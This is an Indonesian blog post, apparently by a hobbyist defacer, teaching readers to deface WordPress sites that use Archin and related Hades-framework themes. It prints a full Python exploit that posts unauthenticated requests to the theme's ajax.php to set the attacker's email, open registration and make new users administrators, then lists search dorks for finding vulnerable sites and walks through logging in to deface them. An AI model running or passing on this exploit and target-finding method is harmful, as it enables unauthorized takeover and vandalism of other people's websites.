eh kamu ,, ketemu lagi sama saya [ ./V404 ]
hihihi ..
nih aku ada tutor untuk deface website Dengan Archin [ Wordpress ]
kali ini pake script PYTHON ( waaw mulai script2an nih :P )
Langsung saja yaaaa ....
Siapkan Bahan :
1. Python ( kalau di Back|Track sudah ada pada default nya )
|| kalau windows bisa download dibawah ini .||
>>> DOWNLOAD <<<
2. Kopi dan Rokok :D
Langkah selanjutnya ..
Aku anggap kamu uda punya , dan install python nya yaa :D
>> Copy Script Python dibawah ini ..
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access*Ganti
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = "Targetkamu"
#path to ajax.php
url = "/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "emailkamu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
>> Targetkamu dengan site target kamu
>> GantiDenganTema dengan tema target kamu
>> emailkamu dengan Email kamu ( nanti user sama pass nanti masuk situ )
hahahahhhhhaaa :D
Setelah kamu copy script diatas ,paste kan ke notepad ,atau apalah .. pkok nya script editor :P
Save filenya dengan berekstensi .py Inget .py , jangan yang lain loh Wkwkwk :P
Contoh : exploit.py [ saya beri nama exploit ]
Lalu cari target website dengan mengunakan dork berikut :
DORK:Lalu Coba Buka Misalnya Saya Tadi Pakek Dork /wp-content/themes/candy/hades_framework/
/wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/
/wp-content/themes/ratius/hades_framework/
/wp-content/themes/dagda/hades_framework/
/wp-content/themes/shopsum/hades_framework/
/wp-content/themes/ultrici/hades_framework/
/wp-content/themes/bizniz/hades_framework/
/wp-content/themes/appius/hades_framework/
/wp-content/themes/majestics/hades_framework/
/wp-content/themes/candy/hades_framework/
/wp-content/themes/vithy/hades_framework/
/wp-content/themes/sodales/hades_framework/
Berarti Ntar Cek Sitenya Vuln Atau Tdk Dengan Cara http://site/wp-content/themes/candy/hades_framework/option_panel/ajax.php/
>>Jika Target Tersebut Blank/Kosong Berarti Web Berikut Vuln :D
Setelah Itu Buka Start => run => cmd
ketik "C:" (karena script yg diatas saya letakkan di local disk C)
ketik lagi "exploit.py" ( karena tadi saya beri nama exploit :P
>>pencet enter.
Jika Sudah Registrasi Password Akan Terkirim Ke Email Tadi Cek Email Kamu ..
Lalu Login deh ke >> http://sitekorban.com/wp-login.php
lalu terserah deh .. mau diapain .. :P
kalau bisa jangan di tebas INDEX.html nya ..
susah loh buat index itu .. RENAME aja :P
Sekian dari saya , semoga bermanfaat :Dhheheheeehe
"I love you Watanabe Mayu ( Mayuyu AKB48 ) :*
Copas kasih sumber ya .. Hargailah Penulis :)Content Creator : ./V404
0 comments:
Post a Comment